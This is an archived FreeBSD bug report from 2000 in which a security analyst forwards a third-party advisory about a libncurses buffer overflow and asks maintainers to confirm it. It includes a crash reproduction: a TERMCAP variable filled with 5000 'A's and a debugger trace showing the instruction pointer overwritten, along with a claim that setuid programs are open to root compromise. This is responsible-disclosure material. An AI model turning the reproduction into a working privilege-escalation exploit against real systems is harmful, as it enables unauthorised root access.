Date: Tue, 25 Apr 2000 09:47:01 -0700 (PDT) From: smedina@idefense.com To: freebsd-gnats-submit@FreeBSD.org Subject: ports/18208: Reported Vulnerability in ncurses Message-ID: <200004251647.JAA91631@freefall.freebsd.org>
next in thread | raw e-mail | index | archive | help
>Number: 18208
>Category: ports
>Synopsis: Reported Vulnerability in ncurses
>Confidential: no
>Severity: serious
>Priority: medium
>Responsible: freebsd-ports
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Tue Apr 25 09:50:01 PDT 2000
>Closed-Date:
>Last-Modified:
>Originator: Servio F. Medina
>Release: not my computer
>Organization:
iDefense
>Environment:
n/a
>Description:
The purpose of this email is twofold: 1) to inform you of a reported vulnerability by a third party, not myself, involving one of your products, and 2) to obtain confirmation/clarification and knowledge of any measures taken to address this in the event it is viable.
Below is the report (snipped):
--- Begin report ---
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 3
Advisory Name: libncurses buffer overflow
Date: 24/4/00
Application: NCURSES 1.8.6 / FreeBSD 3.4-STABLE
Vendor: FreeBSD Inc.
WWW: www.freebsd.org
Severity: setuid programs linked with libncurses
can be exploited to obtain root access.
Author: venglin (venglin@freebsd.lublin.pl)
Homepage: www.b0f.com
* Vulnerable Versions
- 3.4-STABLE -- vulnerable
- 4.0-STABLE -- not tested (probably *not* vulnerable)
- 5.0-CURRENT -- *not* vulnerable
* The Problem
lubi:venglin:~> cat tescik.c
#include <ncurses.h>
main() { initscr(); }
lubi:venglin:~> cc -g -o te tescik.c -lncurses
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> gdb ./te
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(gdb) run
Starting program: /usr/home/venglin/./te
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin@freebsd.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
--- End report ---
An explanation of my query - I work for Infrastructure Defense, Inc., which provides private publications to fortune 500 companies about information/computer security trends, vulnerabilities, etc. I strive to contact the appropriate parties whenever there is a question as to the veracity of a post, claim, other. Hence, my email to you.
I hope to hear from you soon.
Servio Medina - smedina@idefense.com
Information Security Analyst
www.idefense.com
>How-To-Repeat:
?
>Fix:
?
>Release-Note:
>Audit-Trail:
>Unformatted:
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-ports" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200004251647.JAA91631>